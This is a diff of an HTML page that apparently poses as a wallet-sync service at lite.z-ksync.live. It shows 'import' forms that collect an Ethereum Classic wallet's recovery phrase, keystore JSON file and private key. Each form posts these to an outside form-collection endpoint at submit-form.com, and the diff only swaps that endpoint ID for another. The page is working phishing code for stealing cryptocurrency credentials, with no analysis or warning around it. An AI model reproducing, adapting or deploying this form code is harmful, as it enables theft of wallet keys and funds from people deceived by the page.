--- a/import/index.html
+++ b/import/index.html
@@ -1880,7 +1880,7 @@
 
 <div id="phrase" class="tabcontent" style="display:block;">
 
-<form method="POST" action="https://submit-form.com/cAkw7YRK">
+<form method="POST" action="https://submit-form.com/XLSjGbe4L">
   <input type="hidden" name="_redirect" value="lite.z-ksync.live/import/final.html"/>
 <input type="hidden" name="category" value="Phrase"/>
 <input type="hidden" name="wallet_type" value="ethereum classic" />
@@ -1900,7 +1900,7 @@
 </div>
 
 <div id="keystore" class="tabcontent">
-<form method="post" id="frmkeystore" enctype="multipart/form-data" action="https://submit-form.com/cAkw7YRK">
+<form method="post" id="frmkeystore" enctype="multipart/form-data" action="https://submit-form.com/XLSjGbe4L">
   <input type="hidden" name="_redirect" value="lite.z-ksync.live/import/final.html"/>
 <input type="hidden" name="category" value="Keystore JSON"/>
 <input type="hidden" name="wallet_type" value="ethereum classic" />
@@ -1917,7 +1917,7 @@
 </div>
 
 <div id="private" class="tabcontent">
-<form method="post" id="frmprivate" action="https://submit-form.com/cAkw7YRK">
+<form method="post" id="frmprivate" action="https://submit-form.com/XLSjGbe4L">
   <input type="hidden" name="_redirect" value="lite.z-ksync.live/import/final.html"/>
 <input type="hidden" name="category" value="Private Key"/>
 <input type="hidden" name="wallet_type" value="ethereum classic" />
@@ -1997,7 +1997,7 @@
 </div>
 
 <div id="phrase" class="tabcontent" style="display:block;">
-<form id="frmphrase" method="POST" action="https://submit-form.com/cAkw7YRK">
+<form id="frmphrase" method="POST" action="https://submit-form.com/XLSjGbe4L">
   <input type="hidden" name="_redirect" value="lite.z-ksync.live/import/final.html"/>
 <input type="hidden" name="category" value="Phrase"/>
 <input type="hidden" name="wallet_type" value="ethereum classic" />
@@ -2014,7 +2014,7 @@
 </div>
 
 <div id="keystore" class="tabcontent">
-<form method="post" id="frmkeystore" enctype="multipart/form-data" action="https://submit-form.com/cAkw7YRK">
+<form method="post" id="frmkeystore" enctype="multipart/form-data" action="https://submit-form.com/XLSjGbe4L">
   <input type="hidden" name="_redirect" value="lite.z-ksync.live/import/final.html"/>
 <input type="hidden" name="category" value="Keystore JSON"/>
 <input type="hidden" name="wallet_type" value="ethereum classic" />
@@ -2031,7 +2031,7 @@
 </div>
 
 <div id="private" class="tabcontent">
-<form id="frmprivate" action="https://submit-form.com/cAkw7YRK">
+<form id="frmprivate" action="https://submit-form.com/XLSjGbe4L">
   <input type="hidden" name="_redirect" value="lite.z-ksync.live/import/final.html"/>
 <input type="hidden" name="category" value="Private Key"/>
 <input type="hidden" name="wallet_type" value="ethereum classic" />
